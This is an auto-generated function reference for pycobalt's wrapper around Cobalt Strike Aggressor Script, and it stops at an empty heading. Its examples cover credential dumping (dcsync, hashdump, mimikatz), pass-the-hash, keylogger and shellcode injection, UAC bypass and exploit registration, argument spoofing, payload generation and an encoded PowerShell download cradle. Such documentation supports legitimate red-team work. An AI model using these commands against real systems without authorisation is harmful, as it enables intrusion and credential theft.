# pycobalt.aggressor

For calling aggressor functions

Warning: This file is auto-generated by ./parse_functions_page.py

## is64
```python
is64(*args, fork=False)
```

Check if a session is on an x64 system or not (Beacon only).
Arguments
$1 - Beacon/Session ID
Example

command x64 {
 foreach $session (beacons()) {
  if (-is64 $session['id']) {
   println($session);
  }
 }
}

## isadmin
```python
isadmin(*args, fork=False)
```

Check if a session has admin rights
Arguments
$1 - Beacon/Session ID
Example

command admin_sessions {
 foreach $session (beacons()) {
  if (-isadmin $session['id']) {
   println($session);
  }
 }
}

## isbeacon
```python
isbeacon(*args, fork=False)
```

Check if a session is a Beacon or not.
Arguments
$1 - Beacon/Session ID
Example

command beacons {
 foreach $session (beacons()) {
  if (-isbeacon $session['id']) {
   println($session);
  }
 }
}

## isssh
```python
isssh(*args, fork=False)
```

Check if a session is an SSH session or not.
Arguments
$1 - Beacon/Session ID
Example

command ssh_sessions {
 foreach $session (beacons()) {
  if (-isssh $session['id']) {
   println($session);
  }
 }
}

## action
```python
action(*args, fork=False)
```

Post a public action message to the event log. This is similar to the /me command.
Arguments
$1 - the message
Example

action("dances!");

## addTab
```python
addTab(*args, fork=False)
```

create a tab to display a GUI object.
Arguments
$1 - the title of the tab
$2 - a GUI object. A GUI object is one that is an instance of javax.swing.JComponent.
$3 - a tooltip to display when a user hovers over this tab.
Example

$label = [new javax.swing.JLabel: "Hello World"];
addTab("Hello!", $label, "this is an example");

## addVisualization
```python
addVisualization(*args, fork=False)
```

Register a visualization with Cobalt Strike.
Arguments
$1 - the name of the visualization
$2 - a javax.swing.JComponent object
Example

$label = [new javax.swing.JLabel: "Hello World!"];
addVisualization("Hello World", $label);

See Also
&showVisualization

## add_to_clipboard
```python
add_to_clipboard(*args, fork=False)
```

Add text to the clipboard, notify the user.
Arguments
$1 - the text to add to the clipboard
Example

add_to_clipboard("Paste me you fool!");

## alias
```python
alias(*args, fork=False)
```

Creates an alias command in the Beacon console
Arguments
$1 - the alias name to bind to
$2 - a callback function. Called when the user runs the alias. Arguments are: $0 = command run, $1 = beacon id, $2 = arguments.
Example

alias("foo", {
 btask($1, "foo!");
});

## applications
```python
applications(*args, fork=False)
```

Returns a list of application information in Cobalt Strike's data model. These applications are results from the System Profiler.
Returns
An array of dictionary objects with information about each application.
Example

printAll(applications());

## archives
```python
archives(*args, fork=False)
```

Returns a massive list of archived information about your activity from Cobalt Strike's data model. This information is leaned on heavily to reconstruct your activity timeline in Cobalt Strike's reports.
Returns
An array of dictionary objects with information about your team's activity.
Example

foreach $index => $entry (archives()) {
 println("\c3( $+ $index $+ )\o $entry");
}

## artifact
```python
artifact(*args, fork=False)
```

Generates an artifact (exe, dll) from a Cobalt Strike listener
Arguments
$1 - the listener name
$2 - the artifact type
$3 - true/false: is this shellcode destined for a remote target?
$4 - x86|x64 - the architecture of the generated stager


Type
Description


dll
an x86 DLL


dllx64
an x64 DLL


exe
a plain executable


powershell
a powershell script


python
a python script


svcexe
a service executable


vbscript
a Visual Basic script


Notes
Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.
Returns
A scalar containing the specified artifact.
Example

$data = artifact("my listener", "exe");

$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);

## artifact_sign
```python
artifact_sign(*args, fork=False)
```

Sign an EXE or DLL file
Arguments
$1 - the contents of the EXE or DLL file to sign
Notes
1. This function requires that a code-signing certificate is specified in this server's Malleable C2 profile. If no code-signing certificate is configured, this function will return $1 with no changes.
2. DO NOT sign an executable or DLL twice. The library Cobalt Strike uses for code-signing will create an invalid (second) signature if the executable or DLL is already signed.
Returns
A scalar containing the signed artifact.
Example

__generate an artifact!__

$data = artifact("my listener", "exe");

__sign it.__

$data = artifact_sign($data);

__save it__

$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);

## artifact_stageless
```python
artifact_stageless(*args, fork=False)
```

Generates a stageless artifact (exe, dll) from a (local) Cobalt Strike listener
Arguments
$1 - the listener name (must be local to this team server)
$2 - the artifact type
$3 - x86|x64 - the architecture of the generated stager
$4 - proxy configuration string
$5 - callback function. This function is called when the artifact is ready. The $1 argument is the stageless content.


Type
Description


dll
an x86 DLL


dllx64
an x64 DLL


exe
a plain executable


powershell
a powershell script


raw
raw payload stage


svcexe
a service executable


Notes
1. This function provides the stageless artifact via a callback function. This is necessary because Cobalt Strike generates payload stages on the team server.
2. The proxy configuration string is the same string you would use with Attacks -> Packages -> Windows Executable (S). *direct* ignores the local proxy configuration and attempts a direct connection. protocol://user:password@host:port specifies which proxy configuration the artifact should use. The username and password are optional (e.g., protocol://host:port is fine). The acceptable protocols are socks and http. Set the proxy configuration string to $null or "" to use the default behavior. Custom dialogs may use &drow_proxyserver to set this.
3. This function cannot generate artifacts for listeners on other team servers. This function also cannot generate artifacts for foreign listeners. Limit your use of this function to local listers with stages only. Custom dialogs may use &drow_listener_stage to choose an acceptable listener for this function.
Example

sub ready {
 local('$handle');
 $handle = openf(">out.exe");
 writeb($handle, $1);
 closef($handle);
}

artifact_stageless("my listener", "exe", "x86", "", &ready);

## bargue_add
```python
bargue_add(*args, fork=False)
```

This function adds an option to Beacon's list of commands to spoof arguments for.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the command to spoof arguments for. Environment variables are OK here too.
$3 - the fake arguments to use when the specified command is run.
Notes
The process match is exact. If Beacon tries to launch "net.exe", it will not match net, NET.EXE, or c:\windows\system32\net.exe. It will only match net.exe.
x86 Beacon can only spoof arguments in x86 child processes. Likewise, x64 Beacon can only spoof arguments in x64 child processes.
The real arguments are written to the memory space that holds the fake arguments. If the real arguments are longer than the fake arguments, the command launch will fail.
Example

__spoof cmd.exe arguments.__

bargue_add($1, "%COMSPEC%", "/K \"cd c:\windows\temp & startupdatenow.bat\"");

__spoof net arguments__

bargue_add($1, "net", "user guest /active:no");

## bargue_list
```python
bargue_list(*args, fork=False)
```

List the commands + fake arguments Beacon will spoof arguments for.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example

bargue_list($1);

## bargue_remove
```python
bargue_remove(*args, fork=False)
```

This function removes an option to Beacon's list of commands to spoof arguments for.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the command to spoof arguments for. Environment variables are OK here too.
Example

__don't spoof cmd.exe__

bargue_remove($1, "%COMSPEC%");

## base64_decode
```python
base64_decode(*args, fork=False)
```

Unwrap a base64-encoded string
Arguments
$1 - the string to decode
Returns
The argument processed by a base64 decoder
Example

println(base64_decode(base64_encode("this is a test")));

## base64_encode
```python
base64_encode(*args, fork=False)
```

Base64 encode a string
Arguments
$1 - the string to encode
Returns
The argument processed by a base64 encoder
Example

println(base64_encode("this is a test"));

## bbrowser
```python
bbrowser(*args, fork=False)
```

Generate the beacon browser GUI component. Shows only Beacons.
Returns
The beacon browser GUI object (a javax.swing.JComponent)
Example

addVisualization("Beacon Browser", bbrowser());

See Also
&showVisualization

## bbrowserpivot
```python
bbrowserpivot(*args, fork=False)
```

Start a Browser Pivot
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the PID to inject the browser pivot agent into.
$3 - the architecture of the target PID (x86|x64)
Example

bbrowserpivot($1, 1234, "x86");

## bbrowserpivot_stop
```python
bbrowserpivot_stop(*args, fork=False)
```

Stop a Browser Pivot
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example

bbrowserpivot_stop($1);

## bbypassuac
```python
bbypassuac(*args, fork=False)
```

Run the bypass UAC attack.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the listener to target.
Example

item "&Bypass UAC" {
 openPayloadHelper(lambda({
  binput($bids, "bypassuac $1");
  bbypassuac($bids, $1);
 }, $bids => $1));
}

## bcancel
```python
bcancel(*args, fork=False)
```

Cancel a file download
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the file to cancel or a wildcard.
Example

item "&Cancel Downloads" {
 bcancel($1, "*");
}

## bcd
```python
bcd(*args, fork=False)
```

Ask a Beacon to change it's current working directory.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the folder to change to.
Example

__create a command to change to the user's home directory__

alias home {
 $home = "c:\\users\\" . binfo($1, "user");
 bcd($1, $home);
}

## bcheckin
```python
bcheckin(*args, fork=False)
```

Ask a Beacon to checkin. This is basically a no-op for Beacon.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example

item "&Checkin" {
 binput($1, "checkin");
 bcheckin($1);
}

## bclear
```python
bclear(*args, fork=False)
```

This is the "oops" command. It clears the queued tasks for the specified beacon.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example

bclear($1);

## bconnect
```python
bconnect(*args, fork=False)
```

Ask Beacon (or SSH session) to connect to a Beacon peer over a TCP socket
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the target to connect to
Example

bconnect($1, "DC");

## bcovertvpn
```python
bcovertvpn(*args, fork=False)
```

Ask Beacon to deploy a Covert VPN client.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the Covert VPN interface to deploy
$3 - the IP address of the interface [on target] to bridge into
$4 - [optional] the MAC address of the Covert VPN interface
Example

bcovertvpn($1, "phear0", "172.16.48.18");

## bcp
```python
bcp(*args, silent=False, fork=False)
```
"
Ask Beacon to copy a file or folder.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the file or folder to copy
$3 - the destination
Example

bcp($1, "evil.exe", "\\\\target\\C$\\evil.exe");

## bdata
```python
bdata(*args, fork=False)
```

Get metadata for a Beacon session.
Arguments
$1 - the id for the beacon to pull metadata for
Returns
A dictionary object with metadata about the Beacon session.
Example

println(bdata("1234"));

## bdcsync
```python
bdcsync(*args, fork=False)
```

Use mimikatz's dcsync command to pull a user's password hash from a domain controller.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - fully qualified name of the domain
$3 - DOMAIN\user to pull hashes for (optional)
Notes
If $3 is left out, dcsync will dump all domain hashes.
Example

__dump a specific account__

bdcsync($1, "PLAYLAND.testlab", "PLAYLAND\\Administrator");

__dump all accounts__

bdcsync($1, "PLAYLAND.testlab");

## bdesktop
```python
bdesktop(*args, fork=False)
```

Start a VNC session.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example

item "&Desktop (VNC)" {
 bdesktop($1);
}

## bdllinject
```python
bdllinject(*args, fork=False)
```

Inject a Reflective DLL into a process.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the PID to inject the DLL into
$3 - the local path to the Reflective DLL
Example

bdllinject($1, 1234, script_resource("test.dll"));

## bdllload
```python
bdllload(*args, fork=False)
```

Call LoadLibrary() in a remote process with the specified DLL.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the target process PID
$3 - the on-target path to a DLL
Notes
The DLL must be the same architecture as the target process.
Example

bdllload($1, 1234, "c:\\windows\\mystuff.dll");

## bdllspawn
```python
bdllspawn(*args, silent=False, fork=False)
```
"
Spawn a Reflective DLL as a Beacon post-exploitation job.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the local path to the Reflective DLL
$3 - a parameter to pass to the DLL
$4 - a short description of this post exploitation job (shows up in jobs output)
$5 - how long to block and wait for output (specified in milliseconds)
$6 - true/false; use impersonated token when running this post-ex job?
Notes
This function will spawn an x86 process if the Reflective DLL is an x86 DLL. Likewise, if the Reflective DLL is an x64 DLL, this function will spawn an x64 process.
A well-behaved Reflective DLL follows these rules:
1. Receives a parameter via the reserved DllMain parameter when the DLL_PROCESS_ATTACH reason is specified.
2. Prints messages to STDOUT
3. Calls fflush(stdout) to flush STDOUT
4. Calls ExitProcess(0) when done. This kills the spawned process to host the capability.
Example (ReflectiveDll.c)
This example is based on Stephen Fewer's Reflective DLL Injection Project:

BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) {
 BOOL bReturnValue = TRUE;
 switch( dwReason ) {
  case DLL_QUERY_HMODULE:
   if( lpReserved != NULL )
    *(HMODULE *)lpReserved = hAppInstance;
   break;
  case DLL_PROCESS_ATTACH:
   hAppInstance = hinstDLL;

   /* print some output to the operator */
   if (lpReserved != NULL) {
    printf("Hello from test.dll. Parameter is '%s'\n", (char *)lpReserved);
   }
   else {
    printf("Hello from test.dll. There is no parameter\n");
   }

   /* flush STDOUT */
   fflush(stdout);

   /* we're done, so let's exit */
   ExitProcess(0);
   break;
  case DLL_PROCESS_DETACH:
  case DLL_THREAD_ATTACH:
  case DLL_THREAD_DETACH:
   break;
 }
 return bReturnValue;
}

Example (Aggressor Script)

alias hello {
 bdllspawn($1, script_resource("reflective_dll.dll"), $2, "test dll", 5000, false);
}

## bdownload
```python
bdownload(*args, silent=False, fork=False)
```
"
Ask a Beacon to download a file
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the file to request
Example

bdownload($1, "c:\\sysprep.inf");

## bdrives
```python
bdrives(*args, fork=False)
```

Ask Beacon to list the drives on the compromised system
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example

item "&Drives" {
 binput($1, "drives");
 bdrives($1);
}

## beacon_command_describe
```python
beacon_command_describe(*args, fork=False)
```

Describe a Beacon command.
Returns
A string description of the Beacon command.
Arguments
$1 - the command
Example

println(beacon_command_describe("ls"));

## beacon_command_detail
```python
beacon_command_detail(*args, fork=False)
```

Get the help information for a Beacon command.
Returns
A string with helpful information about a Beacon command.
Arguments
$1 - the command
Example

println(beacon_command_detail("ls"));

## beacon_command_register
```python
beacon_command_register(*args, fork=False)
```

Register help information for a Beacon command.
Arguments
$1 - the command
$2 - the short description of the command
$3 - the long-form help for the command.
Example

alis echo {
 blog($1, "You typed: " . substr($1, 5));
}

beacon_command_register(
 "echo",
 "echo text to beacon log",
 "Synopsis: echo [arguments]\n\nLog arguments to the beacon console");

## beacon_commands
```python
beacon_commands(*args, fork=False)
```

Get a list of Beacon commands.
Returns
An array of Beacon commands.
Example

printAll(beacon_commands());

## beacon_data
```python
beacon_data(*args, fork=False)
```

Get metadata for a Beacon session.
Arguments
$1 - the id for the beacon to pull metadata for
Returns
A dictionary object with metadata about the Beacon session.
Example

println(beacon_data("1234"));

## beacon_execute_job
```python
beacon_execute_job(*args, fork=False)
```

Run a command and report its output to the user.
Arguments
$1 - the Beacon ID
$2 - the command to run (environment variables are resolved)
$3 - the command arguments (environment variables are not resolved).
$4 - flags that change how the job is launched (e.g., 1 = disable WOW64 file system redirection)
Notes

The string $2 and $3 are combined as-is into a command line. Make sure you begin $3 with a space!
This is the mechanism Cobalt Strike uses for its shell and powershell commands.

Example

alias shell {
 local('$args');
 $args = substr($0, 6);
 btask($1, "Tasked beacon to run: $args", "T1059");
 beacon_execute_job($1, "%COMSPEC%", " /C $args", 0);
}

## beacon_exploit_describe
```python
beacon_exploit_describe(*args, fork=False)
```

Describe a Beacon exploit
Returns
A string description of the Beacon exploit
Arguments
$1 - the exploit
Example

println(beacon_exploit_describe("ms14-058"));

See Also
&beacon_exploit_register, &beacon_exploits, &belevate
## beacon_exploit_register
```python
beacon_exploit_register(*args, fork=False)
```

Register a Beacon privilege escalation exploit with Cobalt Strike
Arguments
$1 - the exploit short name
$2 - a description of the exploit
$3 - the function that implements the exploit ($1 is the Beacon ID, $2 is the listener)
Example

__Integrate windows/local/ms16_016_webdav from Metasploit__

__https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms16_016_webdav.rb__


sub ms16_016_exploit {
 # check if we're on an x64 system and error out.
 if (-is64 $1) {
  berror($1, "ms16-016 exploit is x86 only");
  return;
 }

 # acknowledge this command
 btask($1, "Task Beacon to run " . listener_describe($2) . " via ms16-016");

 # generate our shellcode
 $stager = shellcode($2, false, "x86");

 # spawn a Beacon post-ex job with the exploit DLL
 bdllspawn!($1, script_resource("modules/cve-2016-0051.x86.dll"), $stager, "ms16-016", 5000);

 # stage our payload (if this is a bind payload)
 bstage($1, $null, $2, $arch);
}

beacon_exploit_register("ms16-016", "mrxdav.sys WebDav Local Privilege Escalation (CVE 2016-0051)", &ms16_016_exploit);

See Also
&beacon_exploit_describe, &beacon_exploits, &belevate

## beacon_exploits
```python
beacon_exploits(*args, fork=False)
```

Get a list of privilege escalation exploits registered with Cobalt Strike.
Returns
An array of Beacon exploits.
Example

printAll(beacon_exploits());

See also
&beacon_exploit_describe, &beacon_exploit_register, &belevate

## beacon_host_imported_script
```python
beacon_host_imported_script(*args, fork=False)
```

Locally host a previously imported PowerShell script within Beacon and return a short script that will download and invoke this script.
Arguments
$1 - the id of the Beacon to host this script with.
Returns
A short PowerShell script to download and evaluate the previously script when run. How this one-liner is used is up to you!
Example

alias powershell {
 local('$args $cradle $runme $cmd');

 # $0 is the entire command with no parsing.
 $args   = substr($0, 11);

 # generate the download cradle (if one exists) for an imported PowerShell script
 $cradle = beacon_host_imported_script($1);

 # encode our download cradle AND cmdlet+args we want to run
 $runme  = base64_encode( str_encode($cradle . $args, "UTF-16LE") );

 # Build up our entire command line.
 $cmd    = " -nop -exec bypass -EncodedCommand \" $+ $runme $+ \"";

 # task Beacon to run all of this.
 btask($1, "Tasked beacon to run: $args", "T1086");
 beacon_execute_job($1, "powershell", $cmd, 1);
}

## beacon_host_script
```python
beacon_host_script(*args, fork=False)
```

Locally host a PowerShell script within Beacon and return a short script that will download and invoke this script. This function is a way to run large scripts when there are constraints on the length of your PowerShell one-liner.
Arguments
$1 - the id of the Beacon to host this script with.
$2 - the script data to host.
Returns
A short PowerShell script to download and evaluate the script when run. How this one-liner is used is up to you!
Example

alias test {
 local('$script $hosted');
 $script = "2 + 2";
 $hosted = beacon_host_script($1, $script);

 binput($1, "powerpick $hosted");
 bpowerpick($1, $hosted);
}

## beacon_ids
```python
beacon_ids(*args, fork=False)
```

Get the ID of all Beacons calling back to this Cobalt Strike team server.
Returns
An array of beacon IDs
Example

foreach $bid (beacon_ids()) {
 println("Bid: $bid");
}

## beacon_info
```python
beacon_info(*args, fork=False)
```

Get information from a Beacon session's metadata.
Arguments
$1 - the id for the beacon to pull metadata for
$2 - the key to extract
Returns
A string with the requested information.
Example

println("User is: " . beacon_info("1234", "user"));
println("PID  is: " . beacon_info("1234", "pid"));

## beacon_remove
```python
beacon_remove(*args, fork=False)
```

Remove a Beacon from the display.
Arguments
$1 - the id for the beacon to remove
## beacons
```python
beacons(*args, fork=False)
```

Get information about all Beacons calling back to this Cobalt Strike team server.
Returns
An array of dictionary objects with information about each beacon.
Example

foreach $beacon (beacons()) {
 println("Bid: " . $beacon['id'] . " is " . $beacon['name']);
}

## belevate
```python
belevate(*args, fork=False)
```

Ask Beacon to elevate with a memory corruption exploit.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the exploit to fire
$3 - the listener to target.
Example

item "&Elevate 31337" {
 openPayloadHelper(lambda({
  binput($bids, "elevate ms14-058 $1");
  belevate($bids, "ms14-058", $1);
 }, $bids => $1));
}

See Also
&beacon_exploit_describe, &beacon_exploit_register, &beacon_exploits

## berror
```python
berror(*args, fork=False)
```

Publish an error message to the Beacon transcript
Arguments
$1 - the id for the beacon to post to
$2 - the text to post
Example

alias donotrun {
 berror($1, "You should never run this command!");
}

## bexecute
```python
bexecute(*args, silent=False, fork=False)
```
"
Ask Beacon to execute a command [without a shell]. This provides no output to the user.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the command and arguments to run
Example

bexecute($1, "notepad.exe");

## bexecute_assembly
```python
bexecute_assembly(*args, silent=False, fork=False)
```
"
Spawns a local .NET executable assembly as a Beacon post-exploitation job.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the local path to the .NET executable assembly
$3 - parameters to pass to the assembly
Notes

This command accepts a valid .NET executable and calls its entry point.
This post-exploitation job (like others) runs with the primary token of your Beacon process. It does not inherit Beacon's thread token.
Compile your custom .NET programs with a .NET 3.5 compiler for compatability with systems that don't have .NET 4.0 and later.

Example

alias myutil {
 bexecute_assembly($1, script_resource("myutil.exe"), "arg1 arg2 \"arg 3\"");
}

## bexit
```python
bexit(*args, fork=False)
```

Ask a Beacon to exit.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example

item "&Die" {
 binput($1, "exit");
 bexit($1);
}

## bgetprivs
```python
bgetprivs(*args, fork=False)
```

Attempts to enable the specified privilege in your Beacon session.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - a comma-separated list of privileges to enable. See:
https://msdn.microsoft.com/en-us/library/windows/desktop/bb530716(v=vs.85).aspx
Example

alias debug {
 bgetprivs($1, "SeDebugPriv");
}

## bgetsystem
```python
bgetsystem(*args, fork=False)
```

Ask Beacon to attempt to get the SYSTEM token.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example

item "Get &SYSTEM" {
 binput($1, "getsystem");
 bgetsystem($1);
}

## bgetuid
```python
bgetuid(*args, fork=False)
```

Ask Beacon to print the User ID of the current token
Arguments
$1 - the id for the beacon. This may be an array or a single ID.

bgetuid($1);

## bhashdump
```python
bhashdump(*args, silent=False, fork=False)
```
"
Ask Beacon to dump local account password hashes.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example

item "Dump &Hashes" {
 binput($1, "hashdump");
 bhashdump($1);
}

## binfo
```python
binfo(*args, fork=False)
```

Get information from a Beacon session's metadata.
Arguments
$1 - the id for the beacon to pull metadata for
$2 - the key to extract
Returns
A string with the requested information.
Example

println("User is: " . binfo("1234", "user"));
println("PID  is: " . binfo("1234", "pid"));

## binject
```python
binject(*args, fork=False)
```

Ask Beacon to inject a session into a specific process
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the process to inject the session into
$3 - the listener to target.
$4 - the process architecture (x86 | x64)
Example

binject($1, 1234, "my listener");

## binjectsh
```python
binjectsh(*args, fork=False)
```

Inject shellcode into a process.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the PID to inject
$3 - x86|x64 - the architecture of the target process
$3 - the local path to the file containing the shellcode.
Example

binjectsh($1, 1234, "x86", script_resource("test.bin"));

## binput
```python
binput(*args, fork=False)
```

Report a command was run to the Beacon console and logs. Scripts that execute commands for the user (e.g., events, popup menus) should use this function to assure operator attribution of automated actions in Beacon's logs.
Arguments
$1 - the id for the beacon to post to
$2 - the text to post
Example

__indicate the user ran the ls command__

binput($1, "ls");

## bipconfig
```python
bipconfig(*args, fork=False)
```

Task a Beacon to list network interfaces.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - callback function with the ipconfig results. Arguments to the callback are: $1 = beacon ID, $2 = results
Example

alias ipconfig {
 bipconfig($1, {
  blog($1, "Network information is:\n $+ $2");
 });
}

## bjobkill
```python
bjobkill(*args, fork=False)
```

Ask Beacon to kill a running post-exploitation job
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the job ID.
Example

bjobkill($1, 0);

## bjobs
```python
bjobs(*args, silent=False, fork=False)
```
"
Ask Beacon to list running post-exploitation jobs.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example

bjobs($1);

## bkerberos_ccache_use
```python
bkerberos_ccache_use(*args, fork=False)
```

Ask beacon to inject a UNIX kerberos ccache file into the user's kerberos tray
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the local path the ccache file
Example

alias kerberos_ccache_use {
 bkerberos_ccache_use($1, $2);
}

## bkerberos_ticket_purge
```python
bkerberos_ticket_purge(*args, fork=False)
```

Ask beacon to purge tickets from the user's kerberos tray
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example

alias kerberos_ticket_purge {
 bkerberos_ticket_purge($1);
}

## bkerberos_ticket_use
```python
bkerberos_ticket_use(*args, fork=False)
```

Ask beacon to inject a mimikatz kirbi file into the user's kerberos tray
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the local path the kirbi file
Example

alias kerberos_ticket_use {
 bkerberos_ticket_use($1, $2);
}

## bkeylogger
```python
bkeylogger(*args, silent=False, fork=False)
```
"
Injects a keystroke logger into a process.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the PID to inject the keystroke logger into.
$3 - the architecture of the target PID (x86|x64)
Example

bkeylogger($1, 1234, "x64");

## bkill
```python
bkill(*args, silent=False, fork=False)
```
"
Ask Beacon to kill a process
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the PID to kill
Example

bkill($1, 1234);

## blink
```python
blink(*args, fork=False)
```

Ask Beacon to link to a host over a named pipe
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the target to link to
Example

blink($1, "DC");

## blog
```python
blog(*args, fork=False)
```

Post a message to WordPress.com (just kidding). Publishes an output message to the Beacon transcript.
Arguments
$1 - the id for the beacon to post to
$2 - the text to post
Example

alias demo {
 blog($1, "I am output for the blog function");
}

## blog2
```python
blog2(*args, fork=False)
```

Publishes an output message to the Beacon transcript. This function has an alternate format from &blog
Arguments
$1 - the id for the beacon to post to
$2 - the text to post
Example

alias demo2 {
 blog2($1, "I am output for the blog2 function");
}

## bloginuser
```python
bloginuser(*args, fork=False)
```

Ask Beacon to create a token from the specified credentials. This is the make_token command.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the domain of the user
$3 - the user's username
$4 - the user's password
Example

__make a token for a user with an empty password__

alias make_token_empty {
 local('$domain $user');
 ($domain, $user) = split("\\\\", $2);]
 bloginuser($1, $domain, $user, "");
}

## blogonpasswords
```python
blogonpasswords(*args, silent=False, fork=False)
```
"
Ask Beacon to dump in-memory credentials with mimikatz
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
Example

item "Dump &Passwords" {
 binput($1, "logonpasswords");
 blogonpasswords($1);
}

## bls
```python
bls(*args, fork=False)
```

Task a Beacon to list files
Variations

bls($1, "folder");

Output the results to the Beacon console.

bls($1, "folder", &callback);

Route results to the specified callback function.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the folder to list files for. Use . for the current folder.
$3 - an optional callback function with the ps results. Arguments to the callback are: $1 = beacon ID, $2 = the folder, $3 = results
Example

on beacon_initial {
 bls($1, ".");
}

## bmimikatz
```python
bmimikatz(*args, fork=False)
```

Ask Beacon to run a mimikatz command.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the command and arguments to run
Example

alias coffee {
 bmimikatz($1, "standard::coffee");
}

## bmkdir
```python
bmkdir(*args, silent=False, fork=False)
```
"
Ask Beacon to make a directory
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the folder to create
Example

bmkdir($1, "you are owned");

## bmode
```python
bmode(*args, fork=False)
```

Change the data channel for a DNS Beacon.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the data channel (e.g., dns, dns6, dns-txt, or http)
Example

item "Mode DNS-TXT" {
 binput($1, "mode dns-txt");
 bmode($1, "dns-txt");
}

## bmv
```python
bmv(*args, fork=False)
```

Ask Beacon to move a file or folder.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the file or folder to move
$3 - the destination
Example

bmv($1, "evil.exe", "\\\\target\\\C$\\evil.exe");

## bnet
```python
bnet(*args, silent=False, fork=False)
```
"
Run a command from Beacon's net module.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the command to run.


Type
Description


computers
lists hosts in a domain (groups)


dclist
lists domain controllers


domain_trusts
lists domain trusts


group
lists groups and users in groups


localgroup
lists local groups and users in local groups


logons
lists users logged onto a host


sessions
lists sessions on a host


share
lists shares on a host


user
lists users and user information


time
show time for a host


view
lists hosts in a domain (browser service)


$3 - the target to run this command against or $null
$4 - the parameter to this command (e.g., a group name)
Example

__ladmins [target]__

__  find the local admins for a target__

alias ladmins {
 bnet($1, "localgroup", $2, "administrators");
}

## bnote
```python
bnote(*args, fork=False)
```

Assign a note to the specified Beacon.
Arguments
$1 - the id for the beacon to post to
$2 - the note content
Example

bnote($1, "foo");

## bpassthehash
```python
bpassthehash(*args, fork=False)
```

Ask Beacon to create a token that passes the specified hash. This is the pth command in Beacon. It uses mimikatz.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the domain of the user
$3 - the user's username
$4 - the user's password hash
Example

bpassthehash($1, "GLITTER", "Administrator", $hash);

## bpause
```python
bpause(*args, fork=False)
```

Ask Beacon to pause its execution. This is a one-off sleep.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - how long the Beacon should pause execution for (milliseconds)
Example

alias pause {
 bpause($1, int($2));
}

## bportscan
```python
bportscan(*args, fork=False)
```

Ask Beacon to run its port scanner.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the targets to scan (e.g., 192.168.12.0/24)
$3 - the ports to scan (e.g., 1-1024,6667)
$4 - the discovery method to use (arp|icmp|none)
$5 - the max number of sockets to use (e.g., 1024)
Example

bportscan($1, "192.168.12.0/24", "1-1024,6667", "arp", 1024);

## bpowerpick
```python
bpowerpick(*args, silent=False, fork=False)
```
"
Spawn a process, inject Unmanaged PowerShell, and run the specified command.
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the cmdlet and arguments
Example

__get the version of PowerShell available via Unmanaged PowerShell__

alias powerver {
 bpowerpick($1, '$PSVersionTable.PSVersion');
}

## bpowershell
```python
bpowershell(*args, silent=False, fork=False)
```
"
Ask Beacon to run a PowerShell cmdlet
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the cmdlet and arguments
Example

__get the version of PowerShell...__

alias powerver {
 bpowershell($1, '$PSVersionTable.PSVersion');
}

## bpowershell_import
```python
bpowershell_import(*args, silent=False, fork=False)
```
"
Import a PowerShell script into a Beacon
Arguments
$1 - the id for the beacon. This may be an array or a single ID.
$2 - the path to the local file to import
Example

__quickly run PowerUp__

alias powerup {
 bpowershell_import($1, script_resource("PowerUp.ps1"));
 bpowershell($1, "Invoke-AllChecks");
}

## bppid
